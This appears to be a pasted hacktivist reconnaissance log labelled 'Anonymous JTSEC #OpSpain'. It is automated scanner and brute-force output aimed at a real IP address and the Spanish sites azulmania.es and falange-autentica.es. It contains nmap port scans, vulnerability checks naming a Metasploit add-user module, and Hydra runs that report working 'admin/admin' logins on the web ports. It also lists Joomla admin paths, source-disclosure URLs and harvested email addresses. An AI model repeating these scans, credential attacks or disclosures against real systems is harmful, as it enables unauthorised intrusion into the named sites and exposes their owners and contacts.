- * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
- [*] Checking web-console: [ ERROR ]
- * The server http://91.121.2.184:8080 is not an HTTP server.
- * Results:
- The server is not vulnerable to bugs tested ... :D
- * Info: review, suggestions, updates, etc:
- https://github.com/joaomatosf/jexboss
- * DONATE: Please consider making a donation to help improve this tool,
- * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
- #######################################################################################################################################
- I, [2018-11-07T17:28:29.047883 #16209] INFO -- : Initiating port scan
- I, [2018-11-07T17:29:17.069699 #16209] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-07_17-28-29.xml
- I, [2018-11-07T17:29:17.071369 #16209] INFO -- : Discovered open port: 91.121.2.184:80
- I, [2018-11-07T17:29:17.806127 #16209] INFO -- : Discovered open port: 91.121.2.184:443
- I, [2018-11-07T17:29:19.020573 #16209] INFO -- : Discovered open port: 91.121.2.184:465
- I, [2018-11-07T17:29:25.958981 #16209] INFO -- : Discovered open port: 91.121.2.184:993
- I, [2018-11-07T17:29:26.431011 #16209] INFO -- : Discovered open port: 91.121.2.184:60443
- I, [2018-11-07T17:29:27.472535 #16209] INFO -- : <<<Enumerating vulnerable applications>>>
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
- | Plixer Scrutinizer NetFlow | http://91.121.2.184:80/cgi-bin/admin.cgi | ./auxiliary/admin/http/scrutinizer_add_user.rb | | |
- +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:32 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 17:32
- Completed NSE at 17:32, 0.00s elapsed
- Initiating NSE at 17:32
- Completed NSE at 17:32, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 17:32
- Completed Parallel DNS resolution of 1 host. at 17:32, 16.50s elapsed
- Initiating SYN Stealth Scan at 17:32
- Scanning 91.121.2.184 [474 ports]
- Discovered open port 80/tcp on 91.121.2.184
- Discovered open port 8080/tcp on 91.121.2.184
- Discovered open port 993/tcp on 91.121.2.184
- Discovered open port 443/tcp on 91.121.2.184
- Discovered open port 22/tcp on 91.121.2.184
- Discovered open port 389/tcp on 91.121.2.184
- Discovered open port 465/tcp on 91.121.2.184
- Discovered open port 7071/tcp on 91.121.2.184
- Completed SYN Stealth Scan at 17:32, 4.31s elapsed (474 total ports)
- Initiating Service scan at 17:32
- Scanning 8 services on 91.121.2.184
- Completed Service scan at 17:33, 21.22s elapsed (8 services on 1 host)
- Initiating OS detection (try #1) against 91.121.2.184
- Retrying OS detection (try #2) against 91.121.2.184
- Initiating Traceroute at 17:33
- Completed Traceroute at 17:33, 0.12s elapsed
- Initiating Parallel DNS resolution of 2 hosts. at 17:33
- Completed Parallel DNS resolution of 2 hosts. at 17:33, 16.50s elapsed
- NSE: Script scanning 91.121.2.184.
- Initiating NSE at 17:33
- Completed NSE at 17:36, 182.65s elapsed
- Initiating NSE at 17:36
- Completed NSE at 17:36, 1.13s elapsed
- Nmap scan report for 91.121.2.184
- Host is up (0.11s latency).
- Not shown: 463 filtered ports
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-hostkey:
- | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
- |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
- 25/tcp closed smtp
- 80/tcp open http Apache httpd (PHP 5.6.14)
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- | http-robots.txt: 83 disallowed entries (15 shown)
- | /*?orderby= /*?orderway= /*?tag= /*?id_currency=
- | /*?search_query= /*?back= /*?n= /*&orderby= /*&orderway= /*&tag=
- | /*&id_currency= /*&search_query= /*&back= /*&n=
- |_/*controller=addresses
- |_http-server-header: Apache
- |_http-title: Did not follow redirect to http://azulmania.es/
- 139/tcp closed netbios-ssn
- 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
- | ssl-cert: Subject: commonName=ks37079.kimsufi.com/organizationName=Zimbra Collaboration Server/stateOrProvinceName=N/A/countryName=US
- | Issuer: commonName=ks37079.kimsufi.com/organizationName=Zimbra Collaboration Server/stateOrProvinceName=N/A/countryName=US
- | Public Key type: rsa
- | Public Key bits: 1024
- | Signature Algorithm: sha1WithRSAEncryption
- | Not valid before: 2013-12-09T09:57:56
- | Not valid after: 2018-12-08T09:57:56
- | MD5: 922f 71f8 2bf1 f953 ff2f 28d6 903f a524
- |_SHA-1: 5aa2 2e6f 9c8b 2556 b75c 87e0 f34a c1ce 2ee3 85a1
- |_ssl-date: TLS randomness does not represent time
- 443/tcp open ssl/http Apache httpd (PHP 5.6.14)
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- | http-robots.txt: 83 disallowed entries (15 shown)
- | /*?orderby= /*?orderway= /*?tag= /*?id_currency=
- | /*?search_query= /*?back= /*?n= /*&orderby= /*&orderway= /*&tag=
- | /*&id_currency= /*&search_query= /*&back= /*&n=
- |_/*controller=addresses
- |_http-server-header: Apache
- |_http-title: Did not follow redirect to http://azulmania.es/
- | ssl-cert: Subject: commonName=azulmania.es
- | Subject Alternative Name: DNS:azulmania.es
- | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-10-30T14:38:09
- | Not valid after: 2019-01-28T14:38:09
- | MD5: 7cc6 2d40 ca18 f165 624a 7ee8 4560 7a18
- |_SHA-1: b9fb 2f96 3ee4 88b7 51d1 bc53 03f9 8a19 02d9 8391
- |_ssl-date: 2018-11-07T22:33:32+00:00; 0s from scanner time.
- 445/tcp closed microsoft-ds
- 465/tcp open ssl/smtps?
- |_smtp-commands: Couldn't establish connection on port 465
- |_ssl-date: TLS randomness does not represent time
- 993/tcp open ssl/imaps?
- |_ssl-date: TLS randomness does not represent time
- 7071/tcp open ssl/iwg1?
- |_ssl-date: 2018-11-07T22:33:32+00:00; 0s from scanner time.
- 8080/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-hostkey:
- | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
- |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
- Device type: general purpose|storage-misc|WAP|broadband router|router|media device
- Running (JUST GUESSING): Linux 2.6.X|3.X (94%), HP embedded (91%), Ubiquiti embedded (90%), MikroTik RouterOS 6.X (89%), Infomir embedded (89%), Netgear RAIDiator 4.X (89%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/h:hp:p2000_g3 cpe:/h:ubnt:airmax_nanostation cpe:/o:mikrotik:routeros:6.19 cpe:/o:linux:linux_kernel:2.6 cpe:/h:infomir:mag-250 cpe:/o:netgear:raidiator:4.2.21
- Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.32 - 3.13 (94%), Linux 2.6.32 - 3.1 (93%), Linux 2.6.32 - 2.6.39 (92%), Linux 2.6.39 (92%), Linux 3.10 (92%), HP P2000 G3 NAS device (91%), Linux 3.2 (91%), Linux 3.11 (91%), Linux 3.5 (91%)
- No exact OS matches for host (test conditions non-ideal).
- Uptime guess: 21.259 days (since Wed Oct 17 12:24:18 2018)
- Network Distance: 2 hops
- TCP Sequence Prediction: Difficulty=254 (Good luck!)
- IP ID Sequence Generation: All zeros
- TRACEROUTE (using port 445/tcp)
- HOP RTT ADDRESS
- 1 107.37 ms 10.251.200.1
- 2 107.15 ms 91.121.2.184
- NSE: Script Post-scanning.
- Initiating NSE at 17:36
- Completed NSE at 17:36, 0.00s elapsed
- Initiating NSE at 17:36
- Completed NSE at 17:36, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 247.95 seconds
- Raw packets sent: 1030 (49.474KB) | Rcvd: 3347 (2.272MB)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:36 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 17:36
- Completed NSE at 17:36, 0.00s elapsed
- Initiating NSE at 17:36
- Completed NSE at 17:36, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 17:36
- Completed Parallel DNS resolution of 1 host. at 17:36, 16.50s elapsed
- Initiating UDP Scan at 17:36
- Scanning 91.121.2.184 [14 ports]
- Completed UDP Scan at 17:36, 2.80s elapsed (14 total ports)
- Initiating Service scan at 17:36
- Scanning 12 services on 91.121.2.184
- Service scan Timing: About 8.33% done; ETC: 17:56 (0:17:58 remaining)
- Completed Service scan at 17:38, 102.58s elapsed (12 services on 1 host)
- Initiating OS detection (try #1) against 91.121.2.184
- Retrying OS detection (try #2) against 91.121.2.184
- Initiating Traceroute at 17:38
- Completed Traceroute at 17:38, 7.16s elapsed
- Initiating Parallel DNS resolution of 1 host. at 17:38
- Completed Parallel DNS resolution of 1 host. at 17:39, 16.50s elapsed
- NSE: Script scanning 91.121.2.184.
- Initiating NSE at 17:39
- Completed NSE at 17:39, 20.36s elapsed
- Initiating NSE at 17:39
- Completed NSE at 17:39, 1.03s elapsed
- Nmap scan report for 91.121.2.184
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using port 137/udp)
- HOP RTT ADDRESS
- 1 104.87 ms 10.251.200.1
- 2 ... 3
- 4 103.93 ms 10.251.200.1
- 5 105.82 ms 10.251.200.1
- 6 105.80 ms 10.251.200.1
- 7 105.65 ms 10.251.200.1
- 8 105.65 ms 10.251.200.1
- 9 105.65 ms 10.251.200.1
- 10 105.65 ms 10.251.200.1
- 11 ... 18
- 19 102.58 ms 10.251.200.1
- 20 105.38 ms 10.251.200.1
- 21 ... 28
- 29 105.02 ms 10.251.200.1
- 30 107.64 ms 10.251.200.1
- NSE: Script Post-scanning.
- Initiating NSE at 17:39
- Completed NSE at 17:39, 0.00s elapsed
- Initiating NSE at 17:39
- Completed NSE at 17:39, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 170.80 seconds
- Raw packets sent: 135 (11.658KB) | Rcvd: 5455 (1.759MB)
- #######################################################################################################################################
- __________ __ ____ ___
- \______ \_______ __ ___/ |_ ____ \ \/ /
- | | _/\_ __ \ | \ __\/ __ \ \ /
- | | \ | | \/ | /| | \ ___/ / \
- |______ / |__| |____/ |__| \___ >___/\ \
- \/ \/ \_/
- + -- --=[BruteX v1.7 by 1N3
- + -- --=[http://crowdshield.com
- ###################################################################################### Running Port Scan ##############################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:39 EST
- Nmap scan report for 91.121.2.184
- Host is up (0.11s latency).
- Not shown: 17 filtered ports, 3 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 22/tcp open ssh
- 80/tcp open http
- 389/tcp open ldap
- 443/tcp open https
- 993/tcp open imaps
- 8080/tcp open http-proxy
- Nmap done: 1 IP address (1 host up) scanned in 18.20 seconds
- ################################### Running Brute Force ###############################################################################
- + -- --=[Port 21 closed... skipping.
- + -- --=[Port 22 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:44
- [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
- [DATA] attacking ssh://91.121.2.184:22/
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:48
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking ssh://91.121.2.184:22/
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:52
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-get://91.121.2.184:80//
- [80][http-get] host: 91.121.2.184 login: admin password: admin
- [STATUS] attack finished for 91.121.2.184 (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:39:53
- + -- --=[Port 110 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:53
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:53
- + -- --=[Port 443 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:53
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-gets://91.121.2.184:443//
- [443][http-get] host: 91.121.2.184 login: admin password: admin
- [STATUS] attack finished for 91.121.2.184 (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:39:54
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 993 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:54
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking imaps://91.121.2.184:993/993
- [STATUS] 133.00 tries/min, 133 tries in 00:01h, 1400 to do in 00:11h, 1 active
- [STATUS] 133.67 tries/min, 401 tries in 00:03h, 1132 to do in 00:09h, 1 active
- [STATUS] 133.29 tries/min, 933 tries in 00:07h, 600 to do in 00:05h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:51:25
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 1521 closed... skipping.
- + -- --=[Port 3306 closed... skipping.
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5901 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:51:25
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- #######################################################################################################################################
- * default
- * default
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 91.121.2.184
- [*] Successfully imported /usr/share/sniper/loot/91.121.2.184/nmap/nmap-91.121.2.184-udp.xml
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 91.121.2.184
- [*] Successfully imported /usr/share/sniper/loot/91.121.2.184/nmap/nmap-udp-91.121.2.184.xml
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 91.121.2.184
- [*] Successfully imported /usr/share/sniper/loot/91.121.2.184/nmap/nmap-91.121.2.184.xml
- Hosts
- =====
- address mac name os_name os_flavor os_sp purpose info comments
- ------- --- ---- ------- --------- ----- ------- ---- --------
- 91.121.2.184 Linux 2.6.X server
- 195.55.47.89 Windows 3.X device
- Services
- ========
- host port proto name state info
- ---- ---- ----- ---- ----- ----
- 91.121.2.184 22 tcp ssh open OpenSSH 5.3 protocol 2.0
- 91.121.2.184 25 tcp smtp closed
- 91.121.2.184 53 udp domain unknown
- 91.121.2.184 67 udp dhcps unknown
- 91.121.2.184 68 udp dhcpc unknown
- 91.121.2.184 69 udp tftp unknown
- 91.121.2.184 80 tcp http open Apache httpd PHP 5.6.14
- 91.121.2.184 88 udp kerberos-sec unknown
- 91.121.2.184 123 udp ntp unknown
- 91.121.2.184 137 udp netbios-ns filtered
- 91.121.2.184 138 udp netbios-dgm filtered
- 91.121.2.184 139 tcp netbios-ssn closed
- 91.121.2.184 139 udp netbios-ssn unknown
- 91.121.2.184 161 udp snmp unknown
- 91.121.2.184 162 udp snmptrap unknown
- 91.121.2.184 389 tcp ldap open OpenLDAP 2.2.X - 2.3.X
- 91.121.2.184 389 udp ldap unknown
- 91.121.2.184 443 tcp ssl/http open Apache httpd PHP 5.6.14
- 91.121.2.184 445 tcp microsoft-ds closed
- 91.121.2.184 465 tcp ssl/smtps open
- 91.121.2.184 520 udp route unknown
- 91.121.2.184 993 tcp ssl/imaps open
- 91.121.2.184 2049 udp nfs unknown
- 91.121.2.184 7071 tcp ssl/iwg1 open
- 91.121.2.184 8080 tcp ssh open OpenSSH 5.3 protocol 2.0
- 195.55.47.89 25 tcp smtp closed
- 195.55.47.89 53 udp domain unknown
- 195.55.47.89 67 udp dhcps unknown
- 195.55.47.89 68 udp dhcpc unknown
- 195.55.47.89 69 udp tftp unknown
- 195.55.47.89 80 tcp http-proxy open Squid http proxy
- 195.55.47.89 88 udp kerberos-sec unknown
- 195.55.47.89 113 tcp ident closed
- 195.55.47.89 123 udp ntp unknown
- 195.55.47.89 137 udp netbios-ns filtered
- 195.55.47.89 138 udp netbios-dgm filtered
- 195.55.47.89 139 tcp netbios-ssn closed
- 195.55.47.89 139 udp netbios-ssn unknown
- 195.55.47.89 161 udp snmp unknown
- 195.55.47.89 162 udp snmptrap unknown
- 195.55.47.89 389 udp ldap unknown
- 195.55.47.89 443 tcp https open Microsoft-HTTPAPI/2.0
- 195.55.47.89 445 tcp microsoft-ds closed
- 195.55.47.89 520 udp route unknown
- 195.55.47.89 2049 udp nfs unknown
- =======================================================================================================================================
- #######################################################################################################################################
- [+] FireWall Detector
- [++] Firewall not detected
- [+] Detecting Joomla Version
- [++] Joomla 3.8.10
- [+] Core Joomla Vulnerability
- [++] Target Joomla core is not vulnerable
- [+] Checking apache info/status files
- [++] Readable info/status files are not found
- [+] admin finder
- [++] Admin page : http://falange-autentica.es/administrator/
- [+] Checking robots.txt existing
- [++] robots.txt is found
- path : http://falange-autentica.es/robots.txt
- Interesting path found from robots.txt
- http://falange-autentica.es/joomla/administrator/
- http://falange-autentica.es/administrator/
- http://falange-autentica.es/bin/
- http://falange-autentica.es/cache/
- http://falange-autentica.es/cli/
- http://falange-autentica.es/components/
- http://falange-autentica.es/includes/
- http://falange-autentica.es/installation/
- http://falange-autentica.es/language/
- http://falange-autentica.es/layouts/
- http://falange-autentica.es/libraries/
- http://falange-autentica.es/logs/
- http://falange-autentica.es/modules/
- http://falange-autentica.es/plugins/
- http://falange-autentica.es/tmp/
- [+] Finding common backup files name
- [++] Backup files are not found
- [+] Finding common log files name
- [++] error log is not found
- [+] Checking sensitive config.php.x file
- [++] Readable config files are not found
- [+] FireWall Detector
- [++] Firewall not detected
- [+] Detecting Joomla Version
- [++] Joomla 3.8.10
- [+] Core Joomla Vulnerability
- [++] Target Joomla core is not vulnerable
- [+] Checking apache info/status files
- [++] Readable info/status files are not found
- [+] admin finder
- [++] Admin page : http://falange-autentica.es/administrator/
- [+] Checking robots.txt existing
- [++] robots.txt is found
- path : http://falange-autentica.es/robots.txt
- Interesting path found from robots.txt
- http://falange-autentica.es/joomla/administrator/
- http://falange-autentica.es/administrator/
- http://falange-autentica.es/bin/
- http://falange-autentica.es/cache/
- http://falange-autentica.es/cli/
- http://falange-autentica.es/components/
- http://falange-autentica.es/includes/
- http://falange-autentica.es/installation/
- http://falange-autentica.es/language/
- http://falange-autentica.es/layouts/
- http://falange-autentica.es/libraries/
- http://falange-autentica.es/logs/
- http://falange-autentica.es/modules/
- http://falange-autentica.es/plugins/
- http://falange-autentica.es/tmp/
- [+] Finding common backup files name
- [++] Backup files are not found
- [+] Finding common log files name
- [++] error log is not found
- [+] Checking sensitive config.php.x file
- [++] Readable config files are not found
- #######################################################################################################################################
- | Check robots.txt:
- | [+] # If the Joomla site is installed within a folder such as at
- | [+] # e.g. www.example.com/joomla/ the robots.txt file MUST be
- | [+] # moved to the site root at e.g. www.example.com/robots.txt
- | [+] # AND the joomla folder name MUST be prefixed to the disallowed
- | [+] # path, e.g. the Disallow rule for the /administrator/ folder
- | [+] # MUST be changed to read Disallow: /joomla/administrator/
- | [+] #
- | [+] # For more information about the robots.txt standard, see:
- | [+] # http://www.robotstxt.org/orig.html
- | [+] #
- | [+] # For syntax checking, see:
- | [+] # http://tool.motoricerca.info/robots-checker.phtml
- | [+]
- | [+] User-agent: *
- | [+] Disallow: /administrator/
- | [+] Disallow: /bin/
- | [+] Disallow: /cache/
- | [+] Disallow: /cli/
- | [+] Disallow: /components/
- | [+] Disallow: /includes/
- | [+] Disallow: /installation/
- | [+] Disallow: /language/
- | [+] Disallow: /layouts/
- | [+] Disallow: /libraries/
- | [+] Disallow: /logs/
- | [+] Disallow: /modules/
- | [+] Disallow: /plugins/
- | [+] Disallow: /tmp/
- #######################################################################################################################################
- | External hosts:
- | [+] External Host Found: http://www.abc.es
- | [+] External Host Found: http://www.sepg.pap.minhap.gob.es
- | [+] External Host Found: http://hemeroteca.lavanguardia.com
- | [+] External Host Found: http://www.diezminutos.org
- | [+] External Host Found: http://www.salvador-dali.org
- | [+] External Host Found: http://www.educacion.gob.es
- | [+] External Host Found: http://www.lasprovincias.es
- | [+] External Host Found: http://www.lanacion.es
- | [+] External Host Found: http://disqus.com
- | [+] External Host Found: http://www.regiondigital.com
- | [+] External Host Found: http://www.elespanol.com
- | [+] External Host Found: http://www.elpais.com
- | [+] External Host Found: http://www.elmundo.es
- | [+] External Host Found: http://tribunadeljurista.foroes.net
- | [+] External Host Found: http://www.levante-emv.com
- | [+] External Host Found: http://www.elperiodico.com
- | [+] External Host Found: http://www.change.org
- | [+] External Host Found: http://diariorc.com
- | [+] External Host Found: http://www.hoy.es
- | [+] External Host Found: http://www.plataforma2003.org
- | [+] External Host Found: http://www.valenciaopinion.es
- | [+] External Host Found: https://www.lavanguardia.com
- | [+] External Host Found: http://azulmania.es
- | [+] External Host Found: http://laboro-spain.blogspot.co.uk
- | [+] External Host Found: http://soydecieza.laverdad.es
- | [+] External Host Found: http://elmunicipio.es
- | [+] External Host Found: http://guarena.hoy.es
- | [+] External Host Found: https://www.facebook.com
- | [+] External Host Found: http://www.20minutos.es
- | [+] External Host Found: http://www.aviladigital.com
- | [+] External Host Found: http://sociedad.elpais.com
- | [+] External Host Found: https://twitter.com
- | [+] External Host Found: https://www.elconfidencial.com
- | [+] External Host Found: http://www.libremercado.com
- | [+] External Host Found: http://www.aexe.es
- | [+] External Host Found: http://www.facebook.com
- | [+] External Host Found: http://www.rednatura2000.info
- | [+] External Host Found: http://www.eldigitaldecanarias.net
- | [+] External Host Found: http://elpais.com
- | [+] External Host Found: http://www.fundacionjoseantonio.es
- | [+] External Host Found: http://www.eleconomista.es
- | [+] External Host Found: http://"tribunadeljurista.foroes.net
- | [+] External Host Found: http://www.attac.es
- | [+] External Host Found: http://www.radioguarena.com
- | [+] External Host Found: https://www.change.org
- | [+] External Host Found: http://www.defensasocial.es
- | [+] External Host Found: http://groups.msn.com
- | [+] External Host Found: http://www.extremadura.falange-autentica.org
- | [+] External Host Found: http://www.rumbos.net
- | [+] External Host Found: http://www.jccm.es
- | [+] External Host Found: http://www.lalinterna.com
- | [+] External Host Found: http://fundacionjoseantonio.es
- | [+] External Host Found: https://www.youtube.com
- | [+] External Host Found: http://www.phoca.cz
- | [+] External Host Found: http://www.diariodeavisos.com
- | [+] External Host Found: http://ecodiario.eleconomista.es
- | [+] External Host Found: http://www.ciezaenlared.com
- | [+] External Host Found: http://www.libertaddigital.com
- | [+] External Host Found: http://gallos-de-marzo.espacioblog.com
- | [+] External Host Found: http://www.articulo.org
- | [+] External Host Found: http://latribunadecartagena.com
- | [+] External Host Found: http://www.falange-autentica.org
- | [+] External Host Found: http://www.lavanguardia.com
- | [+] External Host Found: http://www.elespiadigital.com
- | [+] External Host Found: http://www.ine.es
- | [+] External Host Found: http://www.elperiodicodearagon.com
- | [+] External Host Found: http://www.ocu.org
- | [+] External Host Found: http://www.europapress.es
- | [+] External Host Found: http://www.diariosur.es
- | [+] External Host Found: http://sindicatount.es
- | [+] External Host Found: http://www.ingenierosdemontes.org
- | [+] External Host Found: http://img.youtube.com
- | [+] External Host Found: http://www.foessa.es
- | [+] External Host Found: http://www.hoyguarena.es
- | [+] External Host Found: http://eldiadigital.es
- | [+] External Host Found: http://ciezaenmovimiento.es
- | [+] External Host Found: http://canarias24horas.com
- | [+] External Host Found: http://www.forestales.net
- | [+] External Host Found: http://www.intereconomia.com
- | [+] External Host Found: http://www.miperiodicodigital.com
- | [+] External Host Found: http://www.radiohuesca.com
- | [+] External Host Found: http://www.euractiv.es
- | [+] External Host Found: http://elnuevorotativo.blogspot.com
- | [+] External Host Found: http://www.agorahispanica.es
- | [+] External Host Found: http://ec.europa.eu
- | [+] External Host Found: http://web.archive.org
- | [+] External Host Found: http://www.elmiradordecieza.com
- #######################################################################################################################################
- | Source Code Disclosure:
- | [+] Source Code Found: http://falange-autentica.es/imagenes/5-acto-publico-de-fa-en-alicante-2016/detail/191-dia-de-fa-en-alicante?tmpl=component&phocadownload=2
- | [+] Source Code Found: http://falange-autentica.es/imagenes/16-historia/detail/243-no-volem-solsament-canviar-de-govern-volem-canviar-la-vida?tmpl=component&phocadownload=2
- |
- | FCKeditor File Upload:
- |
- | E-mails:
- | [+] E-mail Found: n@falange-autentica.org
- | [+] E-mail Found: 2@t.2
- | [+] E-mail Found: 7m@i.d
- | [+] E-mail Found: comunicacion@falange-autentica.es
- | [+] E-mail Found: contactar@falange-autentica.es
- | [+] E-mail Found: y0@7.ty
- | [+] E-mail Found: canarias@falange-autentica.org
- =======================================================================================================================================
- ######################################################################################################################################
- Anonymous JTSEC #OpSpain Full Recon #2
Add Comment
Please, Sign In to add comment